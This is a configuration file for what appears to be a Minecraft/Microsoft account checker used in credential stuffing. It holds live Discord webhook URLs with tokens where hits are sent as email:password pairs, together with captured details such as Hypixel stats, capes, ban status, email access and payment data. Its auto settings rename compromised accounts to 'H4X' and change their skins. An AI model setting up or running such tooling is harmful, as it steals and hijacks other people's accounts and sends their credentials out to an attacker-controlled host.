[Settings]
webhook = https://discord.com/api/webhooks/1436006847566839971/_PgvofnJys6dZosIx2_7mbAljjPTHh21SofitKW1ID13WrunEKrNWU8KOQN0JIX-HHW7
embed = True
max retries = 5
proxyless ban check = True
banned webhook = https://discord.com/api/webhooks/1402253552193114132/CYGd888plBuvc14z_Xj8zl29h7nR_kUuf9Gi5eIBQevhA3HT1DpJxqNX5PVEcAUU9cbV
unbanned webhook = https://discord.com/api/webhooks/1402253754174013510/sqFWjfvTcC9y79E9ZMNP2qy5T-ams410HJzDq13A7cWCj8urjCWjVVE2JCmbFuHEln7g
webhookmessage = ||`<email>:<password>`||
	Name: <name>
	Account Type: <type>
	Hypixel: <hypixel>
	Hypixel Level: <level>
	First Hypixel Login: <firstlogin>
	Last Hypixel Login: <lastlogin>
	Optifine Cape: <ofcape>
	MC Capes: <capes>
	Email Access: <access>
	Hypixel Skyblock Coins: <skyblockcoins>
	Hypixel Bedwars Stars: <bedwarsstars>
	Banned: <banned>
	Can Change Name: <namechange>
	Last Name Change: <lastchanged>
use different proxies to ban check = False

[Scraper]
auto scrape minutes = 5

[Auto]
set name = True
name = H4X
set skin = True
skin = https://s.namemc.com/i/bc8429d1f2e15539.png
skin variant = classic

[Captures]
hypixel name = True
hypixel level = True
first hypixel login = True
last hypixel login = True
optifine cape = True
minecraft capes = True
email access = True
hypixel skyblock coins = True
hypixel bedwars stars = True
hypixel ban = True
name change availability = True
last name change = True
payment = True

v